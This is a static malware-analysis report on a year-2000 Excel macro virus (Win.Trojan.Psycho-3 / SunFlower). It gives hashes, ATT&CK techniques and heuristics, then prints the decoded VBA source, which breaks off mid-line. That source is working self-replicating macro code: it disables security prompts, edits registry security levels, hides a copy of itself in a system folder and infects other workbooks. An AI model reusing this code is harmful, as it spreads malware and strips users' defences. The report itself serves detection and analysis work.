Win.Trojan.Psycho-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 0f1a3c080e90536b…

MALICIOUS

Office (OLE)

32.5 KB Created: 2000-09-23 01:55:49 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: f0b149c44900020c7d82c1582aa236cc SHA-1: f14ddea8ec58796cfc01656ac9e83a7296a94717 SHA-256: 0f1a3c080e90536bad3f4dc00001d10b9bff6757754f2074d22419b8b91febb9
188 Risk Score

Malware Insights

Win.Trojan.Psycho-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that leverage `CreateObject` and attempt to write its own code to `C:\Windows\xedit.drv`, likely to download and execute a second-stage payload. It also attempts to establish persistence by saving itself as `Book1.` in the application startup path. The presence of `Win.Trojan.Psycho-3` and `Win.Trojan.SunFlower-1` signatures further supports its malicious nature.

Heuristics 4

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Urgency / deadline lure low SE_URGENCY_LURE
    Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6044 bytes
SHA-256: c587b4a903c0e16ae0e8b0b5d328a76e8a3f6fe9d2943dcb879343081f062c22
Detection
ClamAV: Win.Trojan.SunFlower-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function ExitWindowsEx& Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long)
Private Const EWX_REBOOT = 2
' MarshYello
Private Sub Workbook_Deactivate()
' SunFlower virus By Yello & WalruS (Sept 2000)

    On Error Resume Next
    
    With Application
        .DisplayAlerts = (5 * 2 - 10)
        .Application.ScreenUpdating = (5 * 2 - 10)
        .Application.DisplayStatusBar = (5 * 2 - 10)
    End With

    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

    Open "C:\Windows\xedit.drv" For Output As #1
    Print #1, VBProject.VBComponents(1).codemodule.Lines(1, 110)
    Close #1
    SetAttr ("C:\Windows\xedit.drv"), 6

    Set ActiveWB = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
    Set ThisWB = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule

    CheckExist = Dir(Application.StartupPath & "\Book1.")
    If CheckExist = "" Then
    VBAProject.ThisWorkbook.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
    End If

    If ActiveWB.Lines(3, 1) <> "' MarshYello" Then
        ActiveWB.DeleteLines 1, ActiveWB.CountofLines
        ActiveWB.AddFromFile ("C:\Windows\xedit.drv")
        ActiveWorkbook.Save
    End If
    If Second(Now) > 58 Then Call PayloadOne
End Sub

Private Sub PayloadOne()
Assistant.Visible = True
        With Assistant.NewBalloon
            .Icon = msoIconAlertWarning
            .Text = "SunFlower Virus"
            .Heading = "Yello & WalruS Have You!"
            .Show
        End With
    MsgBox "Hello there " + Application.UserName + Chr(13) + Chr(13) + "Yello & WalruS have control of you P.C." + Chr(13) + Chr(13) + "We have temporally hidden some of your important windows files." + Chr(13) + Chr(13) + "Re-boot now and your P.C will never be the same" + Chr(13) + Chr(13) + "Do yourself a favour and answer our questions" + Chr(13) + Chr(13) + "Get them right and your files will be restored" + Chr(13) + Chr(13) + "Get them wrong and its godnight vienna", vbCritical, "SunFlower Virus"
        question1 = "Divide 30 by 1/2 and add 10. What is the answer ?"
        question2 = "Name one of the authors of this virus ?"
        question3 = "What does the 'V' stand for in DVD ?"
    Count = 1
    Do
    Q1 = InputBox("O.k, Question 1" + Chr(13) + Chr(13) + question1, "SunFlower Virus")
    Count = Count + 1
    Loop Until Q1 = "70"
    Count = 1
    Do
    Q2 = InputBox("O.k, Question 2 a bit harder this time" + Chr(13) + Chr(13) + question2, "SunFlower Virus")
    Count = Count + 1
    If Count = 5 Then MsgBox "Hint: One's a colour!", vbInformation, "I Am The ........."
    Loop Until Q2 = "Walrus" Or Q2 = "walrus" Or Q2 = "Yello" Or Q2 = "yello" Or Q2 = "Yellow" Or Q2 = "yellow"
    Count = 1
    Do
    If Count = 3 Then MsgBox "Last Chance", vbInformation, "SunFlower Virus"
    If Count = 4 Then Call KickOut
    Q3 = InputBox("O.k, Question 3, Get this correct and your home and dry " + Chr(13) + Chr(13) + question3, "SunFlower Virus")
    Count = Count + 1
    Loop Until Q3 = "Versatile" Or Q3 = "versatile"
    Assistant.Visible = True
        With Assistant.NewBalloon
            .Icon = msoIconAlert
            .Text = "Well done. Be Alert...."
            .Heading = "Yello & WalruS have left the building" + Chr(13) + "  Or have they ?"
            .Show
        End With
    Assistant.Animation = msoAnimationGetTechy
End Sub

Private Sub KickOut()
    Dim i As Integer
    On Error Resume Next
    MsgBox "Is it " & Time & " Already ?" + Chr(13) + Chr(13) + "Ive got to go", vbCritical, "Brain D
... (truncated)